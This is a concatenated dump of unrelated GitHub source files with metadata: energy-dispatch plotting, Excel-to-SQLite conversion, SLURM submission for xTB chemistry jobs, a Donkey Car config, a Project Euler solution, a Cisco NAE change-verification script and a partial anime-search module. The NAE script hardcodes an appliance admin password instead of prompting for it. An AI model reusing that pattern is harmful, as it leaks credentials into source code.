pylab.rcParams.update(params)
date1 = datetime.datetime(2017, 1, 1, 0)
date2 = datetime.datetime(2017, 12, 31, 23)
delta = datetime.timedelta(hours=1)
quick_dates = drange(date1, date2, delta)
print(len(quick_dates))
x = quick_dates
y1 = np.vstack([wind_source, solar_source, batt_source, pgp_source ])
pal1 = [wind_c, solar_c, batt_c, pgp_c]
labels1 = ["Wind", "Solar", "Battery", "PGP"]
y2 = np.vstack([demand_sink, pgp_sink, batt_sink])
pal2 = [dem_c, pgp_c, batt_c ]
labels2 = ["Demand"]
#fig, ax = plt.subplots()
#fig, (ax1, ax2, ax3) = plt.subplots(2, 2, sharey=True)
fig = plt.figure()
ax3 = plt.subplot2grid((2, 4), (0, 0), colspan=2, rowspan=2)
#ax3 = plt.subplot(211)
ax3.stackplot(x, y1, colors=pal1, labels=labels1)
ax3.stackplot(x, y2, colors=pal2, labels=labels2)
ax3.plot(x, demand_source, '-', color=dem_c, linewidth=1.2)
ax3.set_xlim(quick_dates[0], quick_dates[-1])
ax3.set_ylim(-2, 2)
#ax3.legend(loc='upper center', bbox_to_anchor=(1.2, 1.04))
chartBox = ax3.get_position()
ax3.set_position([chartBox.x0, chartBox.y0, chartBox.width*1, chartBox.height])
ax3.xaxis.set_major_locator(AutoDateLocator())
ax3.xaxis.set_major_formatter(DateFormatter('%b'))
ax3.xaxis.set_tick_params(direction='out', which='both')
ax3.yaxis.set_tick_params(direction='out', which='both')
ax3.yaxis.set_major_locator(ticker.MultipleLocator(1))
#plt.xticks(rotation=30, ha='right')
#ax3.set_ylabel('Electricity sources and sinks (kW)')
#ax3.set_xlabel('Time')
#fig.autofmt_xdate()
#ax3.set_xlabel('Expensive $\longleftrightarrow$ Cheap\nBaseline PGP capacity cost =\n 1x electrolyzer ($1,100/kW), \n1x fuel cell ($4,600/kW), \n 1x storage ($0.30/kWh)')
#plt.savefig('sources_sinks.eps', bbox_inches='tight')
#plt.show()
##=================
##=================
##=================
##=================
##=================
#from __future__ import division
#import os
#import sys
#import copy
#import numpy as np
#
#
##Find 5-day periods
###===========================================
##Import stuff
###===========================================
#import pickle
#import numpy as np
#from numpy import genfromtxt
#import matplotlib.pyplot as plt
#import matplotlib.gridspec as gridspec
#import matplotlib.ticker as ticker
#
#
#import datetime
#from matplotlib.dates import DayLocator, MonthLocator, HourLocator, AutoDateLocator, DateFormatter, drange
#from matplotlib.dates import MO, TU, WE, TH, FR, SA, SU, WeekdayLocator
#from numpy import arange
#from matplotlib.ticker import ScalarFormatter
#from matplotlib.ticker import FormatStrFormatter
#
#import matplotlib.cm as cm
#import matplotlib.mlab as mlab
##===========================================
def func_time_conversion (input_data, window_size, operation_type = 'mean'):
# NOTE: THIS FUNCTION HAS ONLY BEEN VERIFIED FOR PROPER WRAP-AROUND BEHAVIOR
# FOR 'mean'
# For odd windows sizes, easy. For even need to consider ends where you have half hour of data.
N_periods = len(input_data)
input_data_x3 = np.concatenate((input_data,input_data,input_data))
half_size = window_size / 2.
half_size_full = int(half_size) # number of full things for the mean
output_data = np.zeros(len(input_data))
for ii in range(len(output_data)):
if half_size != float (half_size_full): # odd number, easy
if (operation_type == 'mean'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])/ float(window_size)
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
elif(operation_type == 'sum'):
output_data[ii] = np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full + 1])
else: # even number need to include half of last ones
if (operation_type == 'mean'):
output_data[ii] = ( np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ]) \
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5) / window_size
elif(operation_type == 'min'):
output_data[ii] = np.min(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'max'):
output_data[ii] = np.max(input_data_x3[N_periods + ii - half_size_full -1 : N_periods + ii + half_size_full + 1 ])
elif(operation_type == 'sum'):
output_data[ii] = (
np.sum(input_data_x3[N_periods + ii - half_size_full : N_periods + ii + half_size_full ])
+ input_data_x3[N_periods + ii - half_size_full -1 ] *0.5 + input_data_x3[N_periods + ii + half_size_full + 1 ] *0.5
)
return output_data
##===========================================
def func_find_period (input_data):
window_size = input_data['window_size']
eff_window_size = copy.deepcopy(window_size) # If even go up to next odd number
if eff_window_size == 2 * int (eff_window_size /2 ): # check if even
eff_window_size = eff_window_size + 1 # if so, add 1
data = input_data['data']
search_option = input_data['search_option']
print_option = input_data['print_option']
# -------------------------------------------------------------------------
# Get the down-scaled data
data_in_window = func_time_conversion(data, eff_window_size, 'mean')
# -------------------------------------------------------------------------
if search_option == 'max':
center_index = int(np.argmax(data_in_window))
value = np.max(data_in_window)
elif search_option == 'min':
center_index = int(np.argmin(data_in_window))
value = np.min(data_in_window)
# -------------------------------------------------------------------------
# If interval would go over boundary, then move inteval
if center_index < int(eff_window_size/2):
center_index = int(eff_window_size/2)
if center_index > len(data)- int(eff_window_size/2) - 1:
center_index = len(data) - 1 - int(eff_window_size/2)
# The same algorithm as in func_time_conversion()
left_index = center_index - int(eff_window_size/2)
right_index = center_index + int(eff_window_size/2)
# -------------------------------------------------------------------------
# output
if print_option == 1:
print ( 'center index = {}, value = {}'.format(center_index, value))
print ( 'left index = {}, right index = {}'.format(left_index, right_index))
output = {
'value': value,
'left_index': left_index,
'right_index': right_index,
'center_index': center_index,
}
return output
##===========================================
##=====================================================
pickle_in = open('/Users/jacquelinedowling/MEM_Nov2019/SEM-1.2/Output_Data/Oct29_combos/Oct29_combos_SolarWind_PGPbatt.pickle', 'rb')
#pickle_in = open('/Users/jacquelinedowling/Documents/SEM-1.1_20190114/Output_Data/PGPtest5/PGPtest5_WindSolarPGPBatt_2015.pickle','rb')
base = pickle.load(pickle_in)
info = base[0]
inputs = base[1]
results = base[2]
demand_source = inputs['DEMAND_SERIES']
wind_source = results['DISPATCH_WIND']
solar_source = results['DISPATCH_SOLAR']
batt_source = results['DISPATCH_FROM_STORAGE']
pgp_source = results['DISPATCH_FROM_PGP_STORAGE']
demand_sink = inputs['DEMAND_SERIES']
batt_sink = results['DISPATCH_TO_STORAGE']
pgp_sink = results['DISPATCH_TO_PGP_STORAGE']
study_variable_dict_1 = {
'window_size': 5*24,
'data': results['DISPATCH_FROM_PGP_STORAGE'],
'print_option': 0,
'search_option': 'max'
}
study_variable_dict_2 = {
'window_size': 5*24,
'data': results['DISPATCH_FROM_STORAGE'],
'print_option': 0,
'search_option': 'max'
}
#study_variable_dict_3 = {
# 'window_size': 5*24,
# 'data': results['DISPATCH_FROM_WIND'],
# 'print_option': 0,
# 'search_option': 'max'
# }
study_output_1 = func_find_period(study_variable_dict_1)
study_output_2 = func_find_period(study_variable_dict_2)
start_hour1 = study_output_1['left_index']
end_hour1 = study_output_1['right_index']
start_hour2 = study_output_2['left_index']
end_hour2 = study_output_2['right_index']
##=======================================================
# Figure size settings
##=======================================================
#plt.rcParams.update({'axes.titlesize': 'large'})
#plt.rcParams.update({'axes.labelsize': 'large'})
#
##import matplotlib.pylab as pylab
##params = {'legend.fontsize': 'large',
## 'figure.figsize': (7, 3.5),
## 'axes.labelsize': 'x-large',
## 'axes.titlesize':'large',
## 'xtick.labelsize':'large',
## 'ytick.labelsize':'large'}
##pylab.rcParams.update(params)
##=================================================
#Convert hours to datetime units for plotting
##=================================================
months = [0]
months.append(months[0] + 31*24)
months.append(months[1] + 28*24)
months.append(months[2] + 31*24)
months.append(months[3] + 30*24)
months.append(months[4] + 31*24)
months.append(months[5] + 30*24)
months.append(months[6] + 31*24)
months.append(months[7] + 31*24)
months.append(months[8] + 30*24)
months.append(months[9] + 31*24)
months.append(months[10] + 30*24)
months.append(months[11] + 31*24)
#Start hours is 2015, 9, 6, 12
#End hours is 2015, 9, 11, 12
def convert_start_end (start_hour, end_hour):
start_m = -1
start_h = -1
start_d = -1
hours_remaining_in_month = -1
for i, month in enumerate(months):
if start_hour < month:
start_m = i
hours_remaining_in_month = start_hour - months[i-1]
break
if hours_remaining_in_month > 0:
start_d = hours_remaining_in_month // 24 + 1
start_h = hours_remaining_in_month % 24
else:
print("Error")
print("start_m, start_d, start_h")
print(start_m, start_d, start_h)
end_m = -1
end_h = -1
end_d = -1
hours_remaining_in_month = -1
for i, month in enumerate(months):
if end_hour < month:
end_m = i
hours_remaining_in_month = end_hour - months[i-1]
break
if hours_remaining_in_month > 0:
end_d = hours_remaining_in_month // 24 + 1
end_h = hours_remaining_in_month % 24
else:
print("Error")
print("end_m, end_d, end_h")
print(end_m, end_d, end_h)
return start_m, start_d, start_h, end_m, end_d, end_h
##=================================================
# Two subplots, unpack the axes array immediately
#fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
#ax1.plot(x, y)
#ax1.set_title('Sharing Y axis')
#ax2.scatter(x, y)
##=================================================
#PGP MAX 5-DAYS
print("PGP MAX 5-days")
times = convert_start_end (start_hour1 -6, end_hour1 -6)
#The -6 is to convert from UTC to CST
#date1 = datetime.datetime(2018, times[0], times[1], times[2])
#date2 = datetime.datetime(2018, times[3], times[4], times[5])
date1 = datetime.datetime(2018, times[0], times[1], times[2])
date2 = datetime.datetime(2018, times[3], times[4], times[5])
delta = datetime.timedelta(hours=1)
dates = drange(date1, date2, delta)
print(len(dates))
#x = np.arange(start_hour, end_hour)
x = dates
start_hour = start_hour1
end_hour = end_hour1
demand_source1 = demand_source[start_hour:end_hour]
wind_source1 = wind_source[start_hour:end_hour]
solar_source1 = solar_source[start_hour:end_hour]
pgp_source1 = pgp_source[start_hour:end_hour]
batt_source1 = batt_source[start_hour:end_hour]
demand_sink1 = np.multiply(demand_sink[start_hour:end_hour],-1)
batt_sink1 = np.multiply(batt_sink[start_hour:end_hour],-1)
pgp_sink1 = np.multiply(pgp_sink[start_hour:end_hour],-1)
y1 = np.vstack([wind_source1, solar_source1, pgp_source1, batt_source1 ])
pal1 = [wind_c, solar_c, pgp_c,batt_c]
labels1 = ["Wind", "Solar", "LDS", "Battery" ]
y2 = np.vstack([demand_sink1, pgp_sink1, batt_sink1])
pal2 = [dem_c, pgp_c,batt_c ]
labels2 = ["Demand"]
#fig, ax = plt.subplots()
ax1 = plt.subplot2grid((2, 4), (0, 3), colspan=1, rowspan=2)
#ax1 = plt.subplot(325)
ax1.stackplot(x, y1, colors=pal1, labels=labels1)
ax1.stackplot(x, y2, colors=pal2, labels=labels2)
ax1.plot(x, demand_source1, '-', color=dem_c, linewidth=1.2)
#ax1.set_title('Max PGP dispatch')
ax1.set_xlim(dates[0], dates[-1])
ax1.set_ylim(-2, 2)
ax1.legend(loc='upper center', bbox_to_anchor=(1.45, 1.02))
chartBox = ax1.get_position()
ax1.set_position([chartBox.x0, chartBox.y0, chartBox.width*1, chartBox.height])
#ax.xaxis.set_major_locator(AutoDateLocator())
#ax.xaxis.set_major_locator(HourLocator(interval=24))
ax1.xaxis.set_major_locator(HourLocator(byhour=range(24),interval=24))
#ax1.xaxis.set_major_locator(HourLocator(byhour=(24),interval=24))
#ax1.xaxis.set_major_formatter(DateFormatter('%b %dth')) #This is CST!!! 7am
ax1.xaxis.set_major_formatter(DateFormatter('%b %d')) #This is CST!!! 7am
#ax1.xaxis.set_major_formatter(DateFormatter('%d-%b%H:%M')) #This is CST!!! 7am
plt.setp(ax1.get_yticklabels(), visible=False)
ax1.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.xticks(rotation=30, ha='right')
ax1.xaxis.set_tick_params(direction='out', which='both')
ax1.yaxis.set_tick_params(direction='out', which='both')
#ax1.set_ylabel('Electricity sources and sinks (kW)')
#ax1.set_xlabel('Time')
#fig.autofmt_xdate()
#ax.set_xlabel('Expensive $\longleftrightarrow$ Cheap\nBaseline PGP capacity cost =\n 1x electrolyzer ($1,100/kW), \n1x fuel cell ($4,600/kW), \n 1x storage ($0.30/kWh)')
#plt.savefig('5day_PGP.pdf', bbox_inches='tight')
#plt.show()
##=================================================
#Batt Max 5-DAYS
print("Batt MAX 5-days")
#The -6 is to convert from UTC to CST
times = convert_start_end (start_hour2 -6, end_hour2 -6)
#date1 = datetime.datetime(2015, times[0], times[1], times[2])
#date2 = datetime.datetime(2015, times[3], times[4], times[5])
#print('batt start', times[0], times[1], times[2])
#print('batt end', times[3], times[4], times[5])
date1 = datetime.datetime(2018, times[0], times[1], times[2])
date2 = datetime.datetime(2018, times[3], times[4], times[5])
delta = datetime.timedelta(hours=1)
dates = drange(date1, date2, delta)
print(len(dates))
#x = np.arange(start_hour, end_hour)
x = dates
start_hour = start_hour2
end_hour = end_hour2
demand_source2 = demand_source[start_hour:end_hour]
wind_source2 = wind_source[start_hour:end_hour]
solar_source2 = solar_source[start_hour:end_hour]
pgp_source2 = pgp_source[start_hour:end_hour]
batt_source2 = batt_source[start_hour:end_hour]
demand_sink2 = np.multiply(demand_sink[start_hour:end_hour],-1)
batt_sink2 = np.multiply(batt_sink[start_hour:end_hour],-1)
pgp_sink2 = np.multiply(pgp_sink[start_hour:end_hour],-1)
y1 = np.vstack([wind_source2, solar_source2, pgp_source2, batt_source2 ])
pal1 = [wind_c, solar_c, pgp_c,batt_c]
labels1 = ["Wind", "Solar", "PGP", "Battery" ]
y2 = np.vstack([demand_sink2, pgp_sink2, batt_sink2])
pal2 = [dem_c, pgp_c,batt_c ]
labels2 = ["Demand"]
#fig, ax = plt.subplots()
ax2 = plt.subplot2grid((2, 4), (0, 2), colspan=1, rowspan=2)
#ax2 = plt.subplot(326, sharey=ax1)
ax2.stackplot(x, y1, colors=pal1, labels=labels1)
ax2.stackplot(x, y2, colors=pal2, labels=labels2)
ax2.plot(x, demand_source2, '-', color=dem_c, linewidth=1.2)
#ax2.set_title('Max battery dispatch')
plt.setp(ax2.get_yticklabels(), visible=False)
ax2.set_xlim(dates[0], dates[-1])
ax2.set_ylim(-2, 2)
#ax2.legend(loc='upper center', bbox_to_anchor=(1.45, 1.02))
chartBox = ax2.get_position()
ax2.set_position([chartBox.x0, chartBox.y0, chartBox.width*1, chartBox.height])
#ax.xaxis.set_major_locator(AutoDateLocator())
#ax.xaxis.set_major_locator(HourLocator(interval=24))
ax2.xaxis.set_major_locator(HourLocator(byhour=range(24),interval=24))
#ax2.xaxis.set_major_formatter(DateFormatter('%d-%b-%H:%M')) #This is CST!!! Midnight
#ax2.xaxis.set_major_formatter(DateFormatter('%b %dth')) #This is CST!!! Midnight
ax2.xaxis.set_major_formatter(DateFormatter('%b %d')) #This is CST!!! Midnight
ax2.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.xticks(rotation=30, ha='right')
ax2.xaxis.set_tick_params(direction='out', which='both')
ax2.yaxis.set_tick_params(direction='out', which='both')
#ax2.set_ylabel('Electricity sources and sinks (kW)')
#ax2.set_xlabel('Time')
#fig.autofmt_xdate()
#ax.set_xlabel('Expensive $\longleftrightarrow$ Cheap\nBaseline PGP capacity cost =\n 1x electrolyzer ($1,100/kW), \n1x fuel cell ($4,600/kW), \n 1x storage ($0.30/kWh)')
#plt.savefig('5day_Batt.pdf', bbox_inches='tight')
#plt.show()
#fig.text(0.5, 0.04, 'Time', ha='center')
fig.text(0.06, 0.5, 'Electricty sources and sinks (kW)', va='center', rotation='vertical', size='xx-large' )
fig.text(.135, 0.84, 'a)', size='large')
fig.text(.54, 0.84, 'b)', size='large')
fig.text(.74, 0.84, 'c)', size='large')
#plt.savefig('figure1.pdf', bbox_inches='tight')
#plt.show()
plt.savefig('figs/figure2_dispatch.pdf', bbox_inches='tight')
plt.savefig('eps/figure2_dispatch.eps', bbox_inches='tight')
plt.show() | [
"noreply@github.com"
] | jacquelinedowling.noreply@github.com |
f5d9a6715a5c77400adeb0a9d8f34f25b9e4de0d | 680301f1213d1bc3a7d50e4fcde044d1a2f76c3a | /Excel_to_Python/excel_to_sqlite/excel_to_sqlite.py | 16e2dd28c6775e24c762a860b10ac5662bab2a94 | [] | no_license | marquis90/Code | 0501e9e69040f3be30f91c9a3e3eee2942a93466 | 78030ff17e5597bc79dec0a720a1f386239f4dc1 | refs/heads/master | 2021-09-15T22:52:29.754322 | 2018-06-12T05:42:29 | 2018-06-12T05:42:29 | 103,601,356 | 0 | 0 | null | 2017-09-15T02:42:38 | 2017-09-15T01:51:04 | Python | UTF-8 | Python | false | false | 728 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 13:35:10 2017
@author: jinjianfei
"""
import sqlite3 as sq3
import pandas as pd
import numpy as np
path = 'C:/Users/jinjianfei/.spyder2-py3/'
query = 'CREATE TABLE 资料 (代码 PRIMARY text ,价格 real,简称 text,评级 text, 剩余期限 real,估值 real,前一日估值 real,债券类别 text,成交日期 date)'
con = sq3.connect(path+'最终.db')
con.commit()
df = pd.read_excel('Excel文件.xlsx',index_col='代码')
df.to_sql('最终',con)
con.commit()
# 可成功读取Excel文件,转换为pandas的dataframe格式,然后存储到sqlite中。数据库文件有一个表“资料”,数据库文件名为“最终.db” | [
"noreply@github.com"
] | marquis90.noreply@github.com |
0d0fd83548e4bb7b0511e289f2049081975ea794 | cc1eeda3cdf405f838c8bc6015ff9196e4b1fec4 | /xtb_ts_test/control_xtb_ts.py | 7d112915ce919537481c069a990db91346e27de6 | [] | no_license | jensengroup/ReactionDiscovery | ad6f726193e8941849438eadd0043f6612078b4d | 49b60fea9ec4002ea75fb874cf8175c9be98f73f | refs/heads/main | 2023-06-27T12:56:13.899986 | 2021-07-26T14:00:33 | 2021-07-26T14:00:33 | 343,810,751 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,077 | py | #!/groups/kemi/mharris/.conda/envs/rdkit_2020_09/bin/python
import tarfile
import sys
import os
import textwrap
import time
import shutil
import numpy as np
import pandas as pd
def qsub_prep(job_name, job_dir, script_path, ts_guess, rsmi, psmi, cpus, mem):
"""
write qsub file for SLURM submission
"""
pwd = os.getcwd()
qsub_file = """\
#!/bin/sh
#SBATCH --job-name={0}
#SBATCH --nodes=1
#SBATCH --cpus-per-task={1}
#SBATCH --mem={2}G
#SBATCH --error={3}/{0}.stderr
#SBATCH --output={3}/{0}.stdout
#SBATCH --ntasks=1
#SBATCH --time=100:00:00
#SBATCH --partition=kemi1
#SBATCH --no-requeue
cp {8}/{0}/{5} /scratch/$SLURM_JOB_ID
export GAUSS_SCRDIR=/scratch/$SLURM_JOB_ID
cd /scratch/$SLURM_JOB_ID
#run python code
({4} {5} '{6}' '{7}' {1} {2})
cp -r ts_test_xtb {3}/{8}/{0}/
""".format(job_name, cpus, mem, pwd, script_path, ts_guess, rsmi, psmi,
job_dir)
with open(str(job_name) + "_qsub.tmp", "w") as qsub:
qsub.write(textwrap.dedent(qsub_file))
return str(job_name) + "_qsub.tmp"
def check_path_interpolation(directory):
os.chdir(directory)
files = [f for f in os.listdir(os.curdir) if \
f.endswith("xtbout")]
files.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))
max_energy = None
for file_name in files:
with open(file_name, 'r') as _file:
line = _file.readline()
while line:
if 'TOTAL ENERGY' in line:
energy_au = np.float(line.split()[3])
line = _file.readline()
if not max_energy:
max_energy = energy_au
ts_guess = file_name[:-6]+'xyz'
if energy_au > max_energy:
max_energy = energy_au
ts_guess = file_name[:-6]+'xyz'
#os.remove(file_name)
print(ts_guess, max_energy)
os.chdir('../')
return ts_guess, max_energy
def find_ts_guess(directory):
"""
when sp calculations ar efinished: find the structure with maximum xtb
energy
"""
ts_guess_paths = []
ts_guess_energies = []
os.chdir(directory)
high_temperature = False
if os.path.exists('ht'):
os.chdir('ht')
high_temperature = True
paths = [d for d in os.listdir(os.curdir) if d.startswith('path') and os.path.isdir(d)]
print(paths)
for path in paths:
ts_guess, max_energy = check_path_interpolation(path)
ts_guess_paths.append(path+'/'+ts_guess)
ts_guess_energies.append(max_energy)
ts_guess = ts_guess_paths[ts_guess_energies.index(max(ts_guess_energies))]
if high_temperature:
os.chdir('../')
ts_guess = 'ht/'+ts_guess
#os.mkdir('ts_test_xtb_tmp')
#shutil.copy(ts_guess, 'ts_test_xtb_tmp')
os.chdir('../../../')
return ts_guess
def run_calculations(df, script_path, cpus, mem, max_queue):
"""
For each reaction in the dataframe: do an xTB TS optimization with Gaussian
optimizer. afterwards do IRC to check TS corresponds to intended reaction.
Submits jobs when queue below max_queue
"""
print(df)
submitted_jobs = set()
for job_name, reactant, r_idx, letter in zip(df.index, df.reactant,
df.r_idx, df.letter):
_dir = "{0}/{0}_{1}_{2}".format(reactant, r_idx, letter)
os.mkdir(_dir+'_xtb')
tar = tarfile.open(_dir+'.tar.gz', 'r:gz')
tar.extractall(path=_dir+'_xtb')
tar.close()
ts_guess = find_ts_guess(_dir+'_xtb/'+str(job_name))
rsmi = df.loc[job_name, 'reactant_smiles_am']
psmi = df.loc[job_name, 'product_smiles_am']
qsub_name = qsub_prep(job_name, _dir+'_xtb', script_path, ts_guess, rsmi,
psmi, cpus, mem)
slurmid = os.popen("sbatch " + qsub_name).read()
slurmid = int(slurmid.strip().split()[-1])
submitted_jobs.add(slurmid)
if len(submitted_jobs) >= max_queue:
while True:
job_info = os.popen("squeue -u mharris").readlines()[1:]
current_jobs = {int(job.split()[0]) for job in job_info}
if len(current_jobs) >= max_queue:
time.sleep(15)
else:
finished_jobs = submitted_jobs - current_jobs
for job in finished_jobs:
submitted_jobs.remove(job)
break
while True:
job_info = os.popen("squeue -u mharris").readlines()[1:]
current_jobs = {int(job.split()[0]) for job in job_info}
if len(current_jobs) > 0:
time.sleep(15)
else:
break
if __name__ == "__main__":
df = pd.read_csv(sys.argv[1], index_col=0)
df_under40 = df[df.barrier < 40]
script_path='/groups/kemi/mharris/github/xtb_ts_test/run_xtb_ts.py'
cpus = 1
mem = 2
max_queue = 300
#print(df_under30)
run_calculations(df_under40, script_path, cpus, mem, max_queue)
| [
"mharris@fend02.cluster"
] | mharris@fend02.cluster |
703ee05d7de6a86442dadcdb673707cd9653b0db | e9f04d0d5b92e038a437900ae142136613c03f09 | /car/car-config.py | 12139c2bb8ac0298f0d6acce1bb812c052961adf | [] | no_license | pitkane/donkeyx | fbf950908a2bf618ab8a7f57a1317e5cd0b52989 | c027683d7e4fc43ec70655c498ada59e4935898f | refs/heads/master | 2020-05-24T09:04:10.057245 | 2019-06-03T12:38:16 | 2019-06-03T12:38:16 | 187,197,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | """
CAR CONFIG
This file is read by your car application's car.py script to change the car
performance.
"""
import os
# PATHS
CAR_PATH = PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(CAR_PATH, 'data')
MODELS_PATH = os.path.join(CAR_PATH, 'models')
# VEHICLE
DRIVE_LOOP_HZ = 20
MAX_LOOPS = 100000
# CAMERA
CAMERA_RESOLUTION = (120, 160) # (height, width)
CAMERA_FRAMERATE = DRIVE_LOOP_HZ
# STEERING
STEERING_CHANNEL = 1
STEERING_LEFT_PWM = 420
STEERING_RIGHT_PWM = 360
# THROTTLE
THROTTLE_CHANNEL = 0
THROTTLE_FORWARD_PWM = 400
THROTTLE_STOPPED_PWM = 360
THROTTLE_REVERSE_PWM = 310
# TRAINING
BATCH_SIZE = 128
TRAIN_TEST_SPLIT = 0.8
TUB_PATH = os.path.join(CAR_PATH, 'tub') # if using a single tub
| [
"mikko@mbit.fi"
] | mikko@mbit.fi |
6b5991808844bf4bf53bb9ef1f2ba289ed0cbe2d | 6846a0469efc79b89edc8f856944d5a8005d7244 | /id_0123.py | 8f711263e8087edcc8d3178a22f25e1d21fd0249 | [] | no_license | CGenie/project_euler | 42cb966e13645339490046eb44a729660ae0c092 | cc90edd061b0f4d9e076d5a684b842c202a6812a | refs/heads/master | 2020-06-05T00:41:49.266961 | 2014-01-13T19:11:31 | 2014-01-13T19:11:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 992 | py | #!/usr/bin/python
# #####################################################################
# id_0123.py
#
# Przemyslaw Kaminski <cgenie@gmail.com>
# Time-stamp: <>
######################################################################
from helper_py3 import memoize
def gen_primes():
lst_primes = [2]
yield 2
p = 3
while True:
prime = True
for x in lst_primes:
if p % x == 0:
prime = False
break
if prime:
lst_primes.append(p)
yield p
p += 2
if __name__ == '__main__':
gp = gen_primes()
M = 10**10
n = 0
while True:
pn = next(gp)
n += 1
if pn**2 >= M:
ret = ((-1)**n + 1 + ((-1)**(n - 1) + 1)*n*pn) % pn**2
if (n + 1) % 100 == 0:
print("pn = " + str(pn) + ", n = " + str(n) + ", ret = " + str(ret))
if ret > M:
print("sol = " + str(n))
break
| [
"cgenie@gmail.com"
] | cgenie@gmail.com |
b110cba2ae81ea5ae37394a185a52841af63e9ca | af69680c21d666b089cba68cbe50852290b0be58 | /test_pcv.py | 32e1bba9495f0bc46dbaafadffb10afb0bab87d7 | [] | no_license | camrossi/cnae | b7c32a5dbbed27366a119b0a9ff2d3e353504578 | b59773517dee2f70ff8381905285f7fd77f6a410 | refs/heads/master | 2021-06-25T10:32:55.392323 | 2020-11-17T01:22:55 | 2020-11-17T01:22:55 | 166,747,103 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,379 | py | # This script will pre-configure a NAE appliance for some demo time.
# I expect the appliance to be with no config, if an object already exist I will not update it, the object creation will just fail and I move on.
# To do: Move the configuration snippet outside of this file.
import cnae
import logging
import time
import argparse
import getpass
from pprint import pprint
# Enble logging at debug level
logger = logging.getLogger('cnae')
logger.setLevel(logging.INFO)
def get_args():
parser = argparse.ArgumentParser(description="Prepare an NAE appliace for Demo Time!")
parser.add_argument('-u', dest='user', help='Username, default: admin', default='admin')
parser.add_argument('-d', dest='domain', help='Login Domain, defaul: Local',default='Local')
parser.add_argument('-i', dest='nae_ip', help='IP address of the NAE Appliance',required=True)
args = parser.parse_args()
return args
def deltaAnalysis(ag_name):
epochs = nae.getEpochs(ag_name)
epochs_id = []
# Do a delta analysis only if there are 2+ epochs
if len(epochs) >= 2:
for e in epochs:
epochs_id.append(e['epoch_id'])
#pair the epochs together and drop the last pair, I do not need newest-oldest epoch pair.
#This creates one delta analysis between every epoch
epoch_pairs = (list(zip(epochs_id, epochs_id[1:] + epochs_id[:1])))
epoch_pairs.pop()
#Start epoch delta
i = 1
for e in epoch_pairs:
name = ag_name+ '_' + str(i)
nae.newDeltaAnalysis(name, prior_epoch_uuid=e[0], later_epoch_uuid=e[1])
i = i + 1
args= get_args()
nae_password = "C@ndidadmin1234"
#nae_password = getpass.getpass()
#Create NAE Object
nae = cnae.NAE (args.nae_ip)
#Log in to NAE with user and password
nae.login(args.user, nae_password,args.domain)
# Create PCV
changes ='''[
{
"fvTenant": {
"attributes": {
"descr": "",
"nameAlias": "",
"userdom": "all",
"dn": "uni/tn-I_ROCK",
"name": "123",
"pcv_status": "created"
},
"children": []
}
},
{
"fvTenant": {
"attributes": {
"descr": "",
"nameAlias": "",
"userdom": "all",
"dn": "uni/tn-I_ROCK_MUCH",
"name": "456",
"pcv_status": "created"
},
"children": []
}
},
{
"physDomP": {
"attributes": {
"dn": "uni/phys-NAE-pdom",
"name": "NAE-pdom",
"nameAlias": "",
"ownerKey": "",
"ownerTag": "",
"userdom": ""
}
}
},
{
"infraInfra": {
"attributes": {
"childAction": "",
"dn": "uni/infra"
},
"children": [
{
"infraAttEntityP": {
"attributes": {
"annotation": "orchestrator:aci-containers-controller",
"descr": "",
"dn": "uni/infra/attentp-NAE_AEP",
"name": "NAE_AEP",
"nameAlias": "",
"ownerKey": "",
"ownerTag": "",
"userdom": ""
}
}
}
]
}
}
]'''
nae.newManualPCV(changes = changes,ag_name="Pre Change Verification",name="TestSuper", description="dCloud Demo")
| [
"camrossi@cisco.com"
] | camrossi@cisco.com |
315cd8059a96c4b238904b69055cc4a26063453f | ccf177ecde3d195a057334b2d7c59c371086e735 | /nl_interface/search.py | 1229f6cd81af1b1bf87ce85066c95e0f3414317c | [
"MIT"
] | permissive | amrishparmar/Sammy-for-MyAnimeList | 3fec7bb3fda0752f967d48d4877cd32e9c686ca2 | 507d9749fc0022d7600bf90b673506fd8cf3de11 | refs/heads/master | 2021-08-28T21:08:43.327372 | 2020-12-09T15:59:44 | 2020-12-09T15:59:44 | 79,809,599 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | import html
from enum import Enum
import click
import requests
from bs4 import BeautifulSoup
import agent
import network
import ui
class StatusCode(Enum):
"""An Enum represented the type of result of database searches"""
NO_RESULTS = 0
USER_CANCELLED = 1
def display_entry_details(entry):
"""Display all the details of a given entry
:param entry: an anime or manga entry as a Beautiful Soup Tag object
"""
for detail in entry.children:
# ignore newlines in children
if detail != "\n":
# replace in tag name the underscores with spaces and convert to title case
detail_name = detail.name.replace("_", " ").title()
# set the string to be the detail.string by default
detail_string = detail.string
# check that the string contains something
if detail_string is not None:
# unescape html entities and remove break tags
detail_string = html.unescape(detail_string).replace("<br />", "")
detail_string = detail_string.replace("[i]", "").replace("[/i]", "")
click.echo("{}: {}".format(detail_name, detail_string))
def search(credentials, search_type, search_string, display_details=True):
"""Search for an anime or manga entry
:param credentials: A tuple containing valid MAL account details in the format (username, password)
:param search_type: A string denoting the media type to search for, should be either "anime" or "manga"
:param search_string: A string, the anime or manga to search for
:param display_details: A boolean, whether to print the details of the found entry or whether to just return it
:return: A beautiful soup tag, or a network status code if there was an error or the user quit
"""
if search_type not in ["anime", "manga"]:
